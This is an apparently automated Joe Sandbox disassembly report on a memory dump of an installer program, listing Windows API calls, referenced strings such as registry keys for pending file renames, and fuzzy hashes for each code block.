                                                                                • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                Strings
                                                                                • PendingFileRenameOperations2, xrefs: 00455784
                                                                                • PendingFileRenameOperations, xrefs: 00455754
                                                                                • WININIT.INI, xrefs: 004557E4
                                                                                • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                • API String ID: 47109696-2199428270
                                                                                • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                • API String ID: 1375471231-2952887711
                                                                                • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                APIs
                                                                                • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID: \AB
                                                                                • API String ID: 4191631535-3948367934
                                                                                • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                APIs
                                                                                • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 0042DE50
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003), ref: 0042DE6B
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDeleteHandleModuleProc
                                                                                • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                • API String ID: 588496660-1846899949
                                                                                • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                Strings
                                                                                • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                • NextButtonClick, xrefs: 0046BC4C
                                                                                • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                • API String ID: 0-2329492092
                                                                                • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveChangeNotifyWindow
                                                                                • String ID: $Need to restart Windows? %s
                                                                                • API String ID: 1160245247-4200181552
                                                                                • Opcode ID: ba5f16efbf0dbfb38810013a5ff400e29d778abd1c5f4a70b5438b3cc2cf9249
                                                                                • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                • Opcode Fuzzy Hash: ba5f16efbf0dbfb38810013a5ff400e29d778abd1c5f4a70b5438b3cc2cf9249
                                                                                • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                APIs
                                                                                  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                • String ID: Creating directory: %s
                                                                                • API String ID: 2451617938-483064649
                                                                                • Opcode ID: 4e90ae3be4d00617aa2a0205853b4e8de3d2b048484072f4623b0078b04ad6be
                                                                                • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                • Opcode Fuzzy Hash: 4e90ae3be4d00617aa2a0205853b4e8de3d2b048484072f4623b0078b04ad6be
                                                                                • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressByteCharMultiProcWide
                                                                                • String ID: SfcIsFileProtected$sfc.dll
                                                                                • API String ID: 2508298434-591603554
                                                                                • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                APIs
                                                                                • 754B1520.VERSION(00000000,?,?,?,?), ref: 00452530
                                                                                • 754B1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,?), ref: 0045255D
                                                                                • 754B1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,?), ref: 00452577
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: B1500B1520B1540
                                                                                • String ID: %E
                                                                                • API String ID: 624677603-175436132
                                                                                • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0044B401
                                                                                • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectReleaseSelect
                                                                                • String ID: %H
                                                                                • API String ID: 1831053106-1959103961
                                                                                • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText$ByteCharMultiWide
                                                                                • String ID: %H
                                                                                • API String ID: 65125430-1959103961
                                                                                • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                APIs
                                                                                • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 395431579-1506664499
                                                                                • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                • PendingFileRenameOperations, xrefs: 00455A40
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                • API String ID: 47109696-2115312317
                                                                                • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 00421361
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
